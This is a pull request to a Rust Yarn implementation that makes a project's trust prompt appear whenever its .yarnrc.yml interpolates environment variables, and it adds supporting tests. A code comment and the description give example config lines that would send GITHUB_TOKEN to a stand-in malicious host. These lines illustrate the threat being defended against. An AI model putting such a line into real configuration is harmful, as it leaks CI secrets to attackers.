### PR TITLE
Adds prompt when the project interpolates variables

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -583,15 +583,14 @@ checksum = "baf0a07a401f374238ab8e2f11a104d2851bf9ce711ec69804834de8af45c7af"
 
 [[package]]
 name = "console"
-version = "0.15.11"
+version = "0.16.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "054ccb5b10f9f2cbf51eb355ca1d05c2d279ce1804688d0db74b4733a5aeafd8"
+checksum = "d64e8af5551369d19cf50138de61f1c42074ab970f74e99be916646777f8fc87"
 dependencies = [
  "encode_unicode",
  "libc",
- "once_cell",
  "unicode-width",
- "windows-sys 0.59.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -825,14 +824,12 @@ dependencies = [
 
 [[package]]
 name = "dialoguer"
-version = "0.11.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "658bce805d770f407bc62102fca7c2c64ceef2fbcb2b8bd19d2765ce093980de"
+version = "0.12.0"
+source = "git+https://github.com/arcanis/dialoguer.git?branch=mael%2Fconfirm-prompt-height#2646dce8d26caa6e7d4eee80836dffd7813afcd1"
 dependencies = [
  "console",
  "shell-words",
  "tempfile",
- "thiserror 1.0.69",
  "zeroize",
 ]
 

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -44,7 +44,7 @@ convert_case = "0.8.0"
 dashmap = "6"
 clipanion = { git = "https://github.com/arcanis/clipanion-rs.git", features = ["serde", "tokens"] }
 colored = "3.0.0"
-dialoguer = "0.11.0"
+dialoguer = { git = "https://github.com/arcanis/dialoguer.git", branch = "mael/confirm-prompt-height" }
 dotenvy = "0.15.7"
 divan = { version = "4.2.0", package = "codspeed-divan-compat" }
 ecow = "0.2.6"

--- a/packages/zpm-config/src/lib.rs
+++ b/packages/zpm-config/src/lib.rs
@@ -1,4 +1,4 @@
-use std::{collections::{BTreeMap, BTreeSet}, fmt::Display, ops::Deref, sync::Arc, time::UNIX_EPOCH};
+use std::{cell::Cell, collections::{BTreeMap, BTreeSet}, fmt::Display, ops::Deref, sync::Arc, time::UNIX_EPOCH};
 
 use serde::{Deserialize, Deserializer, Serialize, Serializer, de};
 use zpm_utils::{AbstractValue, Container, Cpu, DataType, FromFileString, IoResultExt, LastModifiedAt, Libc, Os, Path, RawString, Serialized, System, ToFileString, ToHumanString, tree};
@@ -142,6 +142,33 @@ impl<T> Deref for Interpolated<T> {
     }
 }
 
+thread_local! {
+    static REQUIRES_TRUST: Cell<bool> = const { Cell::new(false) };
+}
+
+fn reset_requires_trust() {
+    REQUIRES_TRUST.with(|requires_trust| {
+        requires_trust.set(false);
+    });
+}
+
+fn mark_requires_trust() {
+    REQUIRES_TRUST.with(|requires_trust| {
+        requires_trust.set(true);
+    });
+}
+
+fn take_requires_trust() -> bool {
+    REQUIRES_TRUST.with(|requires_trust| {
+        let value
+            = requires_trust.get();
+
+        requires_trust.set(false);
+
+        value
+    })
+}
+
 impl<'de, T: FromFileString + Deserialize<'de>> Deserialize<'de> for Interpolated<T> where <T as FromFileString>::Error: Display {
     fn deserialize<D: Deserializer<'de>>(deserializer: D) -> Result<Self, D::Error> {
         #[derive(Deserialize)]
@@ -156,6 +183,12 @@ impl<'de, T: FromFileString + Deserialize<'de>> Deserialize<'de> for Interpolate
                 let interpolated
                     = shellexpand::env(&s)
                         .map_err(de::Error::custom)?;
+
+                if interpolated.as_ref() != s {
+                    // If the interpolated value is different from the original, that means it may leak CI secrets,
+                    // for example with `npmRegistryServer: https://malicious.com/${GITHUB_TOKEN}`.
+                    mark_requires_trust();
+                }
 
                 let hydrated
                     = T::from_file_string(&interpolated)
@@ -909,6 +942,7 @@ pub struct Configuration {
     pub settings: Settings,
     pub user_config_path: Option<Path>,
     pub project_config_path: Option<Path>,
+    pub requires_trust: bool,
     pub env_files: BTreeMap<String, String>,
     /// Retained so downstream predicates can re-evaluate without
     /// recomputing the env/cwd snapshot.
@@ -980,6 +1014,11 @@ pub enum HydrateError {
 struct RcFile {
     path: Path,
     text: Option<String>,
+}
+
+fn rc_filename() -> String {
+    std::env::var("YARN_RC_FILENAME")
+        .unwrap_or_else(|_| ".yarnrc.yml".to_string())
 }
 
 #[derive(Clone, Copy, Debug, PartialEq, Eq)]
@@ -1080,7 +1119,22 @@ fn retain_user_conflict_fields(value: &mut serde_yaml::Value, root_mode: Option<
     }
 }
 
-fn deserialize_rc_pair(user_rc: Option<&RcFile>, project_rc: Option<&RcFile>) -> Result<(Partial<intermediate::Settings>, Partial<intermediate::Settings>), ConfigurationError> {
+fn deserialize_intermediate_settings(value: Option<serde_yaml::Value>) -> Result<(Partial<intermediate::Settings>, bool), ConfigurationError> {
+    let Some(value) = value else {
+        return Ok((Partial::Missing, false));
+    };
+
+    reset_requires_trust();
+
+    let settings
+        = serde_yaml::from_value(value)?;
+    let requires_trust
+        = take_requires_trust();
+
+    Ok((Partial::Value(settings), requires_trust))
+}
+
+fn deserialize_rc_pair(user_rc: Option<&RcFile>, project_rc: Option<&RcFile>) -> Result<(Partial<intermediate::Settings>, Partial<intermediate::Settings>, bool), ConfigurationError> {
     let mut user_value = user_rc
         .and_then(|rc| rc.text.as_ref())
         .map(|text| serde_yaml::from_str::<serde_yaml::Value>(text))
@@ -1108,17 +1162,12 @@ fn deserialize_rc_pair(user_rc: Option<&RcFile>, project_rc: Option<&RcFile>) ->
         retain_user_conflict_fields(user_value, project_root_mode, &project_field_modes);
     }
 
-    let user = match user_value {
-        Some(value) => Partial::Value(serde_yaml::from_value(value)?),
-        None => Partial::Missing,
-    };
+    let (user, _user_config_requires_trust)
+        = deserialize_intermediate_settings(user_value)?;
+    let (project, requires_trust)
+        = deserialize_intermediate_settings(project_value)?;
 
-    let project = match project_value {
-        Some(value) => Partial::Value(serde_yaml::from_value(value)?),
-        None => Partial::Missing,
-    };
-
-    Ok((user, project))
+    Ok((user, project, requires_trust))
 }
 
 impl RcFile {
@@ -1247,8 +1296,7 @@ impl Configuration {
             = context.project_cwd.as_ref();
 
         let rc_filename
-            = std::env::var("YARN_RC_FILENAME")
-                .unwrap_or_else(|_| ".yarnrc.yml".to_string());
+            = rc_filename();
 
         // Read both rc files upfront (once each)
         let user_rc
@@ -1298,7 +1346,7 @@ impl Configuration {
             = project_rc.as_ref()
                 .map(|rc| rc.path.clone());
 
-        let (intermediate_user_config, intermediate_project_config)
+        let (intermediate_user_config, intermediate_project_config, requires_trust)
             = deserialize_rc_pair(user_rc.as_ref(), project_rc.as_ref())?;
 
         let mut settings = Settings::merge(
@@ -1320,6 +1368,7 @@ impl Configuration {
             settings,
             user_config_path,
             project_config_path,
+            requires_trust,
             env_files,
             context: enriched_context,
         })

--- a/packages/zpm/src/error.rs
+++ b/packages/zpm/src/error.rs
@@ -433,6 +433,12 @@ pub enum Error {
     #[error("The project at {} isn't trusted, so Yarn won't run install scripts.", .0.to_print_string())]
     ProjectNotTrusted(Path),
 
+    #[error("The project at {} must be trusted before Yarn can interpolate project configuration; run {} to trust it.", .0.to_print_string(), DataType::Code.colorize(&format!("yarn switch trust --set true {}", .0.to_print_string())))]
+    ProjectTrustRequiredForConfigurationInterpolation(Path),
+
+    #[error("The project at {} isn't trusted, so Yarn won't interpolate project configuration.", .0.to_print_string())]
+    ProjectNotTrustedForConfigurationInterpolation(Path),
+
     #[error("No binaries available in the dlx context")]
     MissingBinariesDlxContent,
 

--- a/packages/zpm/src/lib.rs
+++ b/packages/zpm/src/lib.rs
@@ -42,6 +42,7 @@ pub mod script;
 pub mod scratchpad;
 pub mod tasks;
 pub mod tree_resolver;
+pub mod trust;
 pub mod versioning;
 pub mod workspace_glob;
 pub mod workspace_graph;

--- a/packages/zpm/src/lockfile.rs
+++ b/packages/zpm/src/lockfile.rs
@@ -3,10 +3,10 @@ use std::{collections::BTreeMap, fmt::{self, Debug, Display}, hash::Hash, marker
 use rkyv::Archive;
 use itertools::Itertools;
 use serde::{de::{self, Visitor}, Deserialize, Deserializer, Serialize, Serializer};
-use zpm_config::{Configuration, ConfigurationContext};
+use zpm_config::Configuration;
 use zpm_parsers::JsonDocument;
 use zpm_primitives::{Descriptor, Ident, Locator, Range, Reference, RegistryReference, RegistrySemverRange};
-use zpm_utils::{FromFileString, Hash64, LastModifiedAt, Path, ToFileString, UrlEncoded};
+use zpm_utils::{FromFileString, Hash64, Path, ToFileString, UrlEncoded};
 
 use crate::{
     error::Error, http_npm, npm, primitives_exts::RangeExt, resolvers::Resolution
@@ -413,24 +413,7 @@ struct PnpmListDependency {
 /// 2. Recursively walk the tree to collect all packages with their resolved URLs
 /// 3. For each package, read its package.json to get the original dependency ranges
 /// 4. Build descriptor -> locator mappings
-pub fn from_pnpm_node_modules(project_cwd: &Path) -> Result<Lockfile, Error> {
-    let user_cwd
-        = Path::home_dir()?;
-
-    let configuration_context = ConfigurationContext {
-        env: std::env::vars().collect(),
-        user_cwd: user_cwd.clone(),
-        project_cwd: Some(project_cwd.clone()),
-        package_cwd: None,
-    };
-
-    let mut last_modified_at
-        = LastModifiedAt::new();
-
-    let config
-        = Configuration::load(&configuration_context, &mut last_modified_at)
-            .map_err(|e| Error::ConfigurationParseError(Arc::new(e)))?;
-
+pub fn from_pnpm_node_modules(project_cwd: &Path, config: &Configuration) -> Result<Lockfile, Error> {
     let pnpm_dir
         = project_cwd
             .with_join_str("node_modules/.pnpm");

--- a/packages/zpm/src/project.rs
+++ b/packages/zpm/src/project.rs
@@ -26,6 +26,7 @@ use crate::{
     report::{StreamReport, StreamReportConfig, async_section, current_report, with_report_result},
     script::{Binary, ScriptEnvironment},
     tasks::TASK_FILE_NAME,
+    trust::{ensure_project_trusted, ProjectTrustReason},
 };
 
 pub const LOCKFILE_NAME: &str = "yarn.lock";
@@ -204,6 +205,10 @@ impl Project {
             = Configuration::load(&configuration_context, &mut last_modified_at)
                 .map_err(|e| Error::ConfigurationParseError(Arc::new(e)))?;
 
+        if config.requires_trust {
+            ensure_project_trusted(&project_cwd, ProjectTrustReason::ConfigurationInterpolation).await?;
+        }
+
         if config.settings.enable_migration_mode.value {
             config.settings.enable_global_cache.value = true;
             config.settings.enable_global_cache.source = config.settings.enable_migration_mode.source;
@@ -356,14 +361,14 @@ impl Project {
             = self.lockfile_path();
 
         let mut lockfile
-            = Project::lockfile_from(&lockfile_path)?;
+            = Project::lockfile_from(&lockfile_path, &self.config)?;
 
         if self.config.settings.enable_migration_mode.value {
             let source_lockfile_path
                 = self.project_cwd.with_join_str(LOCKFILE_NAME);
 
             let source_lockfile
-                = Project::lockfile_from(&source_lockfile_path)?;
+                = Project::lockfile_from(&source_lockfile_path, &self.config)?;
 
             lockfile.resolutions.extend(source_lockfile.resolutions.into_iter());
         }
@@ -371,7 +376,7 @@ impl Project {
         Ok(lockfile)
     }
 
-    fn lockfile_from(lockfile_path: &Path) -> Result<Lockfile, Error> {
+    fn lockfile_from(lockfile_path: &Path, config: &Configuration) -> Result<Lockfile, Error> {
         if !lockfile_path.fs_exists() {
             // Check for pnpm node_modules in the same directory
             if let Some(project_cwd) = lockfile_path.dirname() {
@@ -379,7 +384,7 @@ impl Project {
                     = project_cwd.with_join_str("node_modules/.pnpm");
 
                 if pnpm_dir.fs_exists() {
-                    return from_pnpm_node_modules(&project_cwd);
+                    return from_pnpm_node_modules(&project_cwd, config);
                 }
             }
 

--- a/packages/zpm/src/report.rs
+++ b/packages/zpm/src/report.rs
@@ -508,7 +508,17 @@ impl Reporter {
     }
 
     fn format_prompt(&self, prompt: &str) -> String {
-        format!("{} {}", "?".color(Color::TrueColor {r: 47, g: 186, b: 135}), prompt.bold())
+        prompt
+            .split('\n')
+            .enumerate()
+            .map(|(idx, line)| {
+                if idx == 0 {
+                    format!("{} {}", "?".color(Color::TrueColor {r: 47, g: 186, b: 135}), line.bold())
+                } else {
+                    format!("  {}", line.bold())
+                }
+            })
+            .join("\n")
     }
 
     fn on_prompt<T: Write>(&mut self, writer: &mut T, prompt: PromptType) {
@@ -530,6 +540,8 @@ impl Reporter {
                     .interact()
                     .unwrap();
 
+                writeln!(writer, "").unwrap();
+
                 self.prompt_tx.send(confirmed.to_string()).unwrap();
             },
 
@@ -542,6 +554,8 @@ impl Reporter {
                     .interact_text()
                     .unwrap();
 
+                writeln!(writer, "").unwrap();
+
                 self.prompt_tx.send(input).unwrap();
             },
 
@@ -553,6 +567,8 @@ impl Reporter {
                     .with_prompt(label)
                     .interact()
                     .unwrap();
+
+                writeln!(writer, "").unwrap();
 
                 self.prompt_tx.send(password).unwrap();
             },
@@ -930,5 +946,34 @@ impl StreamReport {
     pub fn close(self) {
         self.break_request_tx.send(true).unwrap();
         self.handle.join().unwrap();
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use std::{sync::{Arc, mpsc}};
+
+    use super::*;
+
+    fn make_reporter() -> Reporter {
+        let (prompt_tx, _prompt_rx)
+            = mpsc::channel();
+
+        Reporter::new(
+            StreamReportConfig::default(),
+            Arc::new(ReportCounters::default()),
+            prompt_tx,
+        )
+    }
+
+    #[test]
+    fn format_prompt_aligns_multiline_prompts() {
+        let reporter
+            = make_reporter();
+
+        assert_eq!(
+            strip_ansi_codes(&reporter.format_prompt("Would you like to trust this project?\nProject: /path/to/project")),
+            "? Would you like to trust this project?\n  Project: /path/to/project",
+        );
     }
 }

--- a/packages/zpm/src/script.rs
+++ b/packages/zpm/src/script.rs
@@ -3,32 +3,21 @@ use std::{collections::BTreeMap, ffi::OsStr, fs::Permissions, io::Read, os::unix
 use serde::{Deserialize, Serialize};
 use zpm_parsers::JsonDocument;
 use zpm_primitives::Locator;
-use zpm_utils::{DataType, FromFileString, Hash64, Path, ToFileString, shell_escape, to_shell_line};
+use zpm_utils::{FromFileString, Hash64, Path, ToFileString, shell_escape, to_shell_line};
 use itertools::Itertools;
 use regex::Regex;
-use tokio::{process::Command, sync::Mutex};
+use tokio::process::Command;
 
 use crate::{
     error::Error,
     project::Project,
-    report::{current_report, PromptType},
+    trust::{ensure_project_trusted, ProjectTrustReason},
 };
 
 static CJS_LOADER_MATCHER: LazyLock<Regex> = LazyLock::new(|| regex::Regex::new(r"\s*--require\s+\S*\.pnp\.c?js\s*").unwrap());
 static ESM_LOADER_MATCHER: LazyLock<Regex> = LazyLock::new(|| regex::Regex::new(r"\s*--experimental-loader\s+\S*\.pnp\.loader\.mjs\s*").unwrap());
 static PACKAGE_MAP_MATCHER: LazyLock<Regex> = LazyLock::new(|| regex::Regex::new(r#"\s*--experimental-package-map(?:=|\s+)(?:"[^"]*"|'[^']*'|\S+)\s*"#).unwrap());
 static JS_EXTENSION: LazyLock<Regex> = LazyLock::new(|| regex::Regex::new(r"\.[cm]?[jt]sx?$").unwrap());
-type TrustPromptResultCache = BTreeMap<Path, bool>;
-
-static TRUST_PROMPT_RESULTS: LazyLock<Mutex<TrustPromptResultCache>> = LazyLock::new(|| Mutex::new(BTreeMap::new()));
-
-fn get_cached_trust_prompt_result(cache: &TrustPromptResultCache, project_cwd: &Path) -> Option<bool> {
-    cache.get(project_cwd).copied()
-}
-
-fn set_cached_trust_prompt_result(cache: &mut TrustPromptResultCache, project_cwd: &Path, trusted: bool) {
-    cache.insert(project_cwd.clone(), trusted);
-}
 
 fn make_python_entry_point_snippet(binary_name: &str, package_path: &Path, module: &str, object: &str) -> String {
     let binary_name
@@ -153,12 +142,6 @@ fn get_self_path() -> Result<Path, Error> {
         .unwrap_or_else(|| Path::current_exe())?;
 
     Ok(self_path)
-}
-
-fn get_switch_path() -> Option<Path> {
-    std::env::var(zpm_switch::YARNSW_PATH_ENV)
-        .ok()
-        .and_then(|path| Path::from_file_string(&path).ok())
 }
 
 #[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
@@ -645,62 +628,6 @@ impl ScriptEnvironment {
         self
     }
 
-    async fn check_project_trust(switch_path: &Path, project_cwd: &Path) -> Result<Option<bool>, Error> {
-        let status
-            = Command::new(switch_path.to_file_string())
-                .args(["switch", "trust", "--check", project_cwd.as_str()])
-                .stdout(std::process::Stdio::null())
-                .stderr(std::process::Stdio::null())
-                .status()
-                .await?;
-
-        match status.code() {
-            Some(0) => Ok(Some(true)),
-            Some(2) => Ok(Some(false)),
-            Some(3) => Ok(None),
-            _ => Err(Error::ChildProcessFailed("yarn switch trust --check".to_string())),
-        }
-    }
-
-    async fn set_project_trust(switch_path: &Path, project_cwd: &Path, trusted: bool) -> Result<(), Error> {
-        let trusted_arg
-            = trusted.to_string();
-
-        let status
-            = Command::new(switch_path.to_file_string())
-                .args(["switch", "trust", "--set", &trusted_arg, project_cwd.as_str()])
-                .stdout(std::process::Stdio::null())
-                .stderr(std::process::Stdio::null())
-                .status()
-                .await?;
-
-        if status.success() {
-            Ok(())
-        } else {
-            Err(Error::ChildProcessFailed("yarn switch trust --set".to_string()))
-        }
-    }
-
-    async fn prompt_project_trust(project_cwd: &Path) -> Result<bool, Error> {
-        if !zpm_utils::is_terminal() {
-            return Err(Error::ProjectTrustRequired(project_cwd.clone()));
-        }
-
-        let report_guard
-            = current_report().await;
-
-        let report
-            = report_guard.as_ref()
-                .ok_or_else(|| Error::ProjectTrustRequired(project_cwd.clone()))?;
-
-        let answer = report.prompt(PromptType::Confirm(format!(
-            "Yarn needs to run potentially dangerous commands in {}. Do you trust this project?",
-            DataType::Path.colorize(&project_cwd.to_home_string()),
-        ))).await;
-
-        Ok(answer == "true")
-    }
-
     async fn ensure_trusted(&self) -> Result<(), Error> {
         if !self.trust_check_enabled {
             return Ok(());
@@ -710,37 +637,7 @@ impl ScriptEnvironment {
             return Ok(());
         };
 
-        let Some(switch_path) = get_switch_path() else {
-            return Ok(());
-        };
-
-        match Self::check_project_trust(&switch_path, project_cwd).await? {
-            Some(true) => return Ok(()),
-            Some(false) => return Err(Error::ProjectNotTrusted(project_cwd.clone())),
-            None => (),
-        }
-
-        let mut prompt_results
-            = TRUST_PROMPT_RESULTS.lock().await;
-
-        let trusted = match get_cached_trust_prompt_result(&prompt_results, project_cwd) {
-            Some(trusted) => trusted,
-            None => {
-                let trusted
-                    = Self::prompt_project_trust(project_cwd).await?;
-
-                Self::set_project_trust(&switch_path, project_cwd, trusted).await?;
-
-                set_cached_trust_prompt_result(&mut prompt_results, project_cwd, trusted);
-
-                trusted
-            },
-        };
-
-        match trusted {
-            true => Ok(()),
-            false => Err(Error::ProjectNotTrusted(project_cwd.clone())),
-        }
+        ensure_project_trusted(project_cwd, ProjectTrustReason::InstallScripts).await
     }
 
     pub fn with_standard_binaries(mut self) -> Self {
@@ -1057,25 +954,5 @@ impl ScriptEnvironment {
                 .map_err(|e| Error::SpawnFailed { name: "bash".to_string(), path: self.cwd.clone(), error: Arc::new(Box::new(e)) })?;
 
         Ok(status)
-    }
-}
-
-#[cfg(test)]
-mod tests {
-    use super::*;
-
-    #[test]
-    fn trust_prompt_result_cache_is_scoped_by_project_cwd() {
-        let first_project
-            = Path::from_file_string("/tmp/first-project").unwrap();
-        let second_project
-            = Path::from_file_string("/tmp/second-project").unwrap();
-        let mut cache
-            = TrustPromptResultCache::new();
-
-        set_cached_trust_prompt_result(&mut cache, &first_project, true);
-
-        assert_eq!(get_cached_trust_prompt_result(&cache, &first_project), Some(true));
-        assert_eq!(get_cached_trust_prompt_result(&cache, &second_project), None);
     }
 }

--- a/packages/zpm/src/trust.rs
+++ b/packages/zpm/src/trust.rs
@@ -1,0 +1,187 @@
+use std::{collections::BTreeMap, sync::LazyLock};
+
+use tokio::{process::Command, sync::Mutex};
+use zpm_utils::{DataType, FromFileString, Path, ToFileString};
+
+use crate::{
+    error::Error,
+    report::{current_report, PromptType, StreamReport, StreamReportConfig},
+};
+
+type TrustPromptResultCache = BTreeMap<Path, bool>;
+
+static TRUST_PROMPT_RESULTS: LazyLock<Mutex<TrustPromptResultCache>> = LazyLock::new(|| Mutex::new(BTreeMap::new()));
+
+#[derive(Clone, Copy, Debug)]
+pub enum ProjectTrustReason {
+    ConfigurationInterpolation,
+    InstallScripts,
+}
+
+impl ProjectTrustReason {
+    fn required_error(self, project_cwd: Path) -> Error {
+        match self {
+            Self::ConfigurationInterpolation => Error::ProjectTrustRequiredForConfigurationInterpolation(project_cwd),
+            Self::InstallScripts => Error::ProjectTrustRequired(project_cwd),
+        }
+    }
+
+    fn not_trusted_error(self, project_cwd: Path) -> Error {
+        match self {
+            Self::ConfigurationInterpolation => Error::ProjectNotTrustedForConfigurationInterpolation(project_cwd),
+            Self::InstallScripts => Error::ProjectNotTrusted(project_cwd),
+        }
+    }
+
+    fn prompt_message(self, project_cwd: &Path) -> String {
+        match self {
+            Self::ConfigurationInterpolation => format!(
+                "Yarn needs to interpolate values in the configuration file.\nAttackers could use this mechanism to leak environment variables.\n\nDo you trust the project in {}?",
+                DataType::Path.colorize(&project_cwd.to_home_string()),
+            ),
+
+            Self::InstallScripts => format!(
+                "Yarn needs to run potentially dangerous commands to complete the installation.\nAttackers could use this mechanism to run arbitrary code.\n\nDo you trust the project in {}?",
+                DataType::Path.colorize(&project_cwd.to_home_string()),
+            ),
+        }
+    }
+}
+
+fn get_cached_trust_prompt_result(cache: &TrustPromptResultCache, project_cwd: &Path) -> Option<bool> {
+    cache.get(project_cwd).copied()
+}
+
+fn set_cached_trust_prompt_result(cache: &mut TrustPromptResultCache, project_cwd: &Path, trusted: bool) {
+    cache.insert(project_cwd.clone(), trusted);
+}
+
+fn get_switch_path() -> Option<Path> {
+    std::env::var(zpm_switch::YARNSW_PATH_ENV)
+        .ok()
+        .and_then(|path| Path::from_file_string(&path).ok())
+}
+
+async fn check_project_trust(switch_path: &Path, project_cwd: &Path) -> Result<Option<bool>, Error> {
+    let status
+        = Command::new(switch_path.to_file_string())
+            .args(["switch", "trust", "--check", project_cwd.as_str()])
+            .stdout(std::process::Stdio::null())
+            .stderr(std::process::Stdio::null())
+            .status()
+            .await?;
+
+    match status.code() {
+        Some(0) => Ok(Some(true)),
+        Some(2) => Ok(Some(false)),
+        Some(3) => Ok(None),
+        _ => Err(Error::ChildProcessFailed("yarn switch trust --check".to_string())),
+    }
+}
+
+async fn trust_project(switch_path: &Path, project_cwd: &Path) -> Result<(), Error> {
+    let status
+        = Command::new(switch_path.to_file_string())
+            .args(["switch", "trust", "--set", "true", project_cwd.as_str()])
+            .stdout(std::process::Stdio::null())
+            .stderr(std::process::Stdio::null())
+            .status()
+            .await?;
+
+    if status.success() {
+        Ok(())
+    } else {
+        Err(Error::ChildProcessFailed("yarn switch trust --set".to_string()))
+    }
+}
+
+async fn prompt_project_trust(project_cwd: &Path, reason: ProjectTrustReason) -> Result<bool, Error> {
+    if !zpm_utils::is_terminal() {
+        return Err(reason.required_error(project_cwd.clone()));
+    }
+
+    let prompt
+        = PromptType::Confirm(reason.prompt_message(project_cwd));
+
+    let report_guard
+        = current_report().await;
+
+    if let Some(report) = report_guard.as_ref() {
+        let answer
+            = report.prompt(prompt).await;
+
+        return Ok(answer == "true");
+    }
+
+    drop(report_guard);
+
+    let report
+        = StreamReport::new(StreamReportConfig::default());
+
+    let answer
+        = report.prompt(prompt).await;
+
+    report.close();
+
+    Ok(answer == "true")
+}
+
+pub async fn ensure_project_trusted(project_cwd: &Path, reason: ProjectTrustReason) -> Result<(), Error> {
+    let Some(switch_path) = get_switch_path() else {
+        return Ok(());
+    };
+
+    match check_project_trust(&switch_path, project_cwd).await? {
+        Some(true) => return Ok(()),
+        Some(false) => return Err(reason.not_trusted_error(project_cwd.clone())),
+        None => (),
+    }
+
+    let mut prompt_results
+        = TRUST_PROMPT_RESULTS.lock().await;
+
+    let trusted = match get_cached_trust_prompt_result(&prompt_results, project_cwd) {
+        Some(trusted) => trusted,
+        None => {
+            let trusted
+                = prompt_project_trust(project_cwd, reason).await?;
+
+            if trusted {
+                trust_project(&switch_path, project_cwd).await?;
+            }
+
+            set_cached_trust_prompt_result(&mut prompt_results, project_cwd, trusted);
+
+            trusted
+        },
+    };
+
+    match trusted {
+        true => Ok(()),
+        false => Err(reason.not_trusted_error(project_cwd.clone())),
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn trust_prompt_result_cache_is_scoped_by_project_cwd() {
+        let first_project
+            = Path::from_file_string("/tmp/first-project").unwrap();
+        let second_project
+            = Path::from_file_string("/tmp/second-project").unwrap();
+        let third_project
+            = Path::from_file_string("/tmp/third-project").unwrap();
+        let mut cache
+            = TrustPromptResultCache::new();
+
+        set_cached_trust_prompt_result(&mut cache, &first_project, true);
+        set_cached_trust_prompt_result(&mut cache, &second_project, false);
+
+        assert_eq!(get_cached_trust_prompt_result(&cache, &first_project), Some(true));
+        assert_eq!(get_cached_trust_prompt_result(&cache, &second_project), Some(false));
+        assert_eq!(get_cached_trust_prompt_result(&cache, &third_project), None);
+    }
+}

--- a/tests/acceptance-tests/pkg-tests-specs/sources/commands/switch/trust.test.ts
+++ b/tests/acceptance-tests/pkg-tests-specs/sources/commands/switch/trust.test.ts
@@ -1,3 +1,5 @@
+import {Filename, ppath, xfs} from '@yarnpkg/fslib';
+
 describe(`Commands`, () => {
   describe(`switch trust`, () => {
     test(
@@ -95,6 +97,61 @@ describe(`Commands`, () => {
           env: {CI: `1`},
         })).rejects.toMatchObject({
           code: 2,
+        });
+      }),
+    );
+
+    test(
+      `it should require trust before interpolating project configuration through Yarn Switch`,
+      makeTemporaryEnv({}, async ({path, runSwitch}) => {
+        await xfs.writeJsonPromise(ppath.join(path, Filename.rc), {
+          initScope: `\${CONFIG_INIT_SCOPE}`,
+        });
+
+        await expect(runSwitch(`config`, `get`, `initScope`, {
+          env: {CONFIG_INIT_SCOPE: `acme`},
+        })).rejects.toMatchObject({
+          code: 1,
+          stdout: expect.stringContaining(`must be trusted before Yarn can interpolate project configuration`),
+        });
+
+        await runSwitch(`switch`, `trust`, `--set`, `true`, path);
+
+        await expect(runSwitch(`config`, `get`, `initScope`, {
+          env: {CONFIG_INIT_SCOPE: `acme`},
+        })).resolves.toMatchObject({
+          code: 0,
+          stdout: `acme\n`,
+        });
+      }),
+    );
+
+    test(
+      `it shouldn't require trust when project configuration values don't change during interpolation`,
+      makeTemporaryEnv({}, async ({path, runSwitch}) => {
+        await xfs.writeJsonPromise(ppath.join(path, Filename.rc), {
+          initScope: `$`,
+        });
+
+        await expect(runSwitch(`config`, `get`, `initScope`)).resolves.toMatchObject({
+          code: 0,
+          stdout: `$\n`,
+        });
+      }),
+    );
+
+    test(
+      `it shouldn't require trust for interpolating user configuration through Yarn Switch`,
+      makeTemporaryEnv({}, async ({path, runSwitch}) => {
+        await xfs.writeJsonPromise(ppath.join(ppath.dirname(path), Filename.rc), {
+          initScope: `\${CONFIG_INIT_SCOPE}`,
+        });
+
+        await expect(runSwitch(`config`, `get`, `initScope`, {
+          env: {CONFIG_INIT_SCOPE: `acme`},
+        })).resolves.toMatchObject({
+          code: 0,
+          stdout: `acme\n`,
         });
       }),
     );


### PR DESCRIPTION
A potential attacker could add a yarnrc file that would interpolate environment secrets and send them to an arbitrary registry. For example this:

```yaml
npmRegistryServer: https://malicious.com/?secret=${GITHUB_TOKEN}
```

The same issue affected pnpm (https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r) which decided to forbid interpolation inside the project-level settings, but I'd like to avoid doing that as there are valid use cases for enterprise users.

To avoid that we now taint the configuration when we detect interpolation attempts, and ask the user to validate they trust the project before continuing.

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> Security-sensitive: project config can pull secrets from the environment, and trust gating now blocks Yarn until the user confirms—behavior changes on every project load when interpolation occurs.
> 
> **Overview**
> Mitigates **CI secret exfiltration** via malicious project `.yarnrc.yml` values (e.g. registry URLs embedding `${GITHUB_TOKEN}`) by treating **successful env interpolation** during project config load as a trust signal.
> 
> During `Interpolated` deserialization, if `shellexpand::env` changes the string, the loader sets **`Configuration.requires_trust`** (project rc only; user-level interpolation does not). **`Project::new`** then calls shared **`ensure_project_trusted`** with a **configuration-interpolation** reason and dedicated errors before continuing.
> 
> **Project trust** logic moves from `script.rs` into **`trust.rs`** (`ProjectTrustReason` for install scripts vs config interpolation). **Reporter** prompts support **multiline** trust copy; **dialoguer** is pinned to a git branch for confirm prompt height. **`from_pnpm_node_modules`** takes an existing **`Configuration`** instead of reloading config.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 55d456bb9da4841ec22386b44cb12369dae5c997. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->